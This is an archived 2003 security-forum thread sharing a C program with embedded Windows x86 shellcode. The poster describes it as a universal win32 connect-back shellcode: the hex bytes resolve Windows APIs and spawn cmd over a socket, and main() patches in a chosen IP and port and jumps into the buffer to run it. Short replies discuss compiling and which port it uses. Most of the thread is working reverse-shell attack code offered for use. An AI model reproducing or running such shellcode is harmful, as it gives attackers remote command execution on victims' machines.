M00winconn Shellcode Demo

GovernmentSecurity.org > The Archives > Public Downloads

Anarchy

Nov 4 2003, 12:09 PM

//m00winconn shellcode demo
//by drG4njubas(drG4njubas@m00security.org)

#include <winsock.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32") //add by Anarchy

//not xored shellcode
char shellcode[]=
"\xE9\xC4\x02\x00\x00\x5D\x55\x31\xDB\x64"
"\x8B\x03\x40\x93\x8B\x43\xFF\x40\x75\xF9"
"\x8B\x53\x03\x66\x31\xD2\x66\xB8\x00\x10"
"\x66\x81\x3A\x4D\x5A\x74\x07\x29\xC2\xE9"
"\xF2\xFF\xFF\xFF\x89\xD3\x8B\x7A\x3C\x01"
"\xD7\x03\x5F\x78\x8B\x4B\x18\x8B\x73\x20"
"\x8B\x7B\x24\x01\xD6\x01\xD7\xFC\xAD\x01"
"\xD0\x96\x87\xFD\x51\x31\xC9\x80\xC1\x0F"
"\xF3\xA6\x72\x0A\x96\x59\x87\xFD\x74\x12"
"\x47\x47\xE2\xE6\xBE\x0F\x00\x00\x00\x29"
"\xCE\x29\xF7\xE9\xE8\xFF\xFF\xFF\x31\xC0"
"\x66\x8B\x07\xC1\xE0\x02\x8B\x73\x1C\x01"
"\xD6\x01\xC6\xAD\x01\xD0\x89\xC6\x89\xD7"
"\x5D\x89\x95\xB1\x00\x00\x00\x8D\x9D\x5E"
"\x00\x00\x00\x53\x57\xFF\xD6\x68\x00\x01"
"\x00\x00\x68\x40\x00\x00\x00\xFF\xD0\x89"
"\x85\xC5\x00\x00\x00\x8D\x9D\x28\x00\x00"
"\x00\x53\x57\xFF\xD6\x50\x68\x00\x00\x00"
"\x00\x8D\x9D\xC9\x00\x00\x00\x53\x8D\x95"
"\xB5\x00\x00\x00\x52\x8D\x95\xB9\x00\x00"
"\x00\x52\xFF\xD0\x58\x68\x00\x00\x00\x00"
"\x53\x8D\x95\xBD\x00\x00\x00\x52\x8D\x95"
"\xC1\x00\x00\x00\x52\xFF\xD0\x8D\x9D\x33"
"\x00\x00\x00\x53\x57\xFF\xD6\x8B\x9D\xC5"
"\x00\x00\x00\x53\xFF\xD0\x8B\x85\xB5\x00"
"\x00\x00\x89\x43\x40\x89\x43\x3C\x8B\x85"
"\xC1\x00\x00\x00\x89\x43\x38\xC7\x43\x2C"
"\x01\x01\x00\x00\x8D\x85\x43\x00\x00\x00"
"\x50\x57\xFF\xD6\x53\x53\x31\xC9\x51\x51"
"\x51\x68\x01\x00\x00\x00\x51\x51\x8D\x9D"
"\xD5\x00\x00\x00\x53\x68\x00\x00\x00\x00"
"\xFF\xD0\x8D\x9D\x52\x00\x00\x00\x53\x57"
"\xFF\xD6\x50\xFF\xB5\xB5\x00\x00\x00\xFF"
"\xD0\x58\xFF\xB5\xC1\x00\x00\x00\xFF\xD0"
"\x8D\x9D\x0F\x00\x00\x00\x53\x57\xFF\xD6"
"\x8D\x9D\x91\x00\x00\x00\x53\xFF\xD0\x89"
"\xC7\x8D\x9D\x99\x00\x00\x00\x53\x50\xFF"
"\xD6\x68\x00\x00\x00\x00\x68\x01\x00\x00"
"\x00\x68\x02\x00\x00\x00\xFF\xD0\x89\x85"
"\xB5\x00\x00\x00\x8D\x9D\xAA\x00\x00\x00"
"\x53\x57\xFF\xD6\x87\xBD\xB1\x00\x00\x00"
"\x68\x10\x00\x00\x00\x8D\x9D\xD9\x00\x00"
"\x00\x53\xFF\xB5\xB5\x00\x00\x00\xFF\xD0"
"\x74\x05\xE9\x03\x01\x00\x00\x8D\x85\x6A"
"\x00\x00\x00\x50\x57\xFF\xD6\x31\xC9\x51"
"\x51\x8D\x9D\xC1\x00\x00\x00\x53\x68\x00"
"\x01\x00\x00\x51\xFF\xB5\xB9\x00\x00\x00"
"\xFF\xD0\x3D\x00\x00\x00\x00\x74\x5B\x81"
"\x3B\x00\x00\x00\x00\x74\x5F\x8D\x85\x78"
"\x00\x00\x00\x50\x57\xFF\xD6\x68\x00\x00"
"\x00\x00\x53\x68\x00\x01\x00\x00\xFF\xB5"
"\xC5\x00\x00\x00\xFF\xB5\xB9\x00\x00\x00"
"\xFF\xD0\x3D\x00\x00\x00\x00\x74\x29\x8D"
"\x85\xA5\x00\x00\x00\x50\xFF\xB5\xB1\x00"
"\x00\x00\xFF\xD6\x68\x00\x00\x00\x00\xFF"
"\x33\xFF\xB5\xC5\x00\x00\x00\xFF\xB5\xB5"
"\x00\x00\x00\xFF\xD0\x3D\xFF\x00\x00\x00"
"\x74\x36\xE8\x76\x01\x00\x00\xE9\x6F\xFF"
"\xFF\xFF\x8D\x9D\xA0\x00\x00\x00\x53\xFF"
"\xB5\xB1\x00\x00\x00\xFF\xD6\x68\x00\x00"
"\x00\x00\x68\x00\x01\x00\x00\xFF\xB5\xC5"
"\x00\x00\x00\xFF\xB5\xB5\x00\x00\x00\xFF"
"\xD0\x3D\xFF\x00\x00\x00\x74\x44\x3D\x00"
"\x00\x00\x00\x74\x3D\x89\x85\xC1\x00\x00"
"\x00\x8D\x85\x87\x00\x00\x00\x50\x57\xFF"
"\xD6\x68\x00\x00\x00\x00\x8D\x9D\xC1\x00"
"\x00\x00\x53\xFF\x33\xFF\xB5\xC5\x00\x00"
"\x00\xFF\xB5\xBD\x00\x00\x00\xFF\xD0\x3D"
"\x00\x00\x00\x00\x74\x0A\xE8\x04\x01\x00"
"\x00\xE9\xFD\xFE\xFF\xFF\x8D\x85\x1C\x00"
"\x00\x00\x50\x57\xFF\xD6\x68\x00\x00\x00"
"\x00\xFF\xD0\xE8\x37\xFD\xFF\xFF\x47\x65"
"\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65"
"\x73\x73\x00\x4C\x6F\x61\x64\x4C\x69\x62"
"\x72\x61\x72\x79\x41\x00\x45\x78\x69\x74"
"\x50\x72\x6F\x63\x65\x73\x73\x00\x43\x72"
"\x65\x61\x74\x65\x50\x69\x70\x65\x00\x47"
"\x65\x74\x53\x74\x61\x72\x74\x75\x70\x49"
"\x6E\x66\x6F\x41\x00\x43\x72\x65\x61\x74"
"\x65\x50\x72\x6F\x63\x65\x73\x73\x41\x00"
"\x43\x6C\x6F\x73\x65\x48\x61\x6E\x64\x6C"
"\x65\x00\x47\x6C\x6F\x62\x61\x6C\x41\x6C"
"\x6C\x6F\x63\x00\x50\x65\x65\x6B\x4E\x61"
"\x6D\x65\x64\x50\x69\x70\x65\x00\x52\x65"
"\x61\x64\x46\x69\x6C\x65\x00\x53\x6C\x65"
"\x65\x70\x00\x57\x72\x69\x74\x65\x46\x69"
"\x6C\x65\x00\x77\x73\x6F\x63\x6B\x33\x32"
"\x00\x73\x6F\x63\x6B\x65\x74\x00\x72\x65"
"\x63\x76\x00\x73\x65\x6E\x64\x00\x63\x6F"
"\x6E\x6E\x65\x63\x74\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00"
"\x00\x63\x6D\x64\x00\x02\x00"
"\x7A\x69" //port number here
"\x7F\x00\x00\x01" //ip address here
"\x00\x00\x00\x00\x00\x00\x00"
"\x00\x8D\x85\x81\x00\x00\x00\x50\x57\xFF"
"\xD6\x68\x50\x00\x00\x00\xFF\xD0\xC3";

void main(int argc, char* argv[]){

if(argc < 3){
printf("USAGE: demo.exe <IP> <PORT>\n");
return;
}

WSADATA *wsa = new WSADATA;
WSAStartup(MAKEWORD(1,0), wsa);
char *buffer = new char[sizeof(shellcode)];
for(int i = 0; i < sizeof(shellcode); i++)buffer[i]=shellcode[i];

//set ip address
unsigned long ip = inet_addr(argv[1]);
memcpy(buffer+939, &ip, 4);

//set port number
unsigned short port = htons(atoi(argv[2]));
memcpy(buffer+937, &port, 2);

//execute shellcode
__asm jmp [buffer]
}

Anarchy

Nov 4 2003, 12:14 PM

#pragma comment(lib,"ws2_32")
u can add ws2_32.lib with alt-f7 when u compile it too

Anddos

Nov 4 2003, 02:42 PM

what port does this use?

ThEWaTcHeR

Nov 4 2003, 02:45 PM

i think port 2 or 937

Anddos

Nov 4 2003, 02:50 PM

and this will give u a shell cmd command?

Anarchy

Nov 5 2003, 05:45 AM

its an universal win32 connect-back shellcode

][no0b][

Nov 5 2003, 06:41 AM

thx for sharing man

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.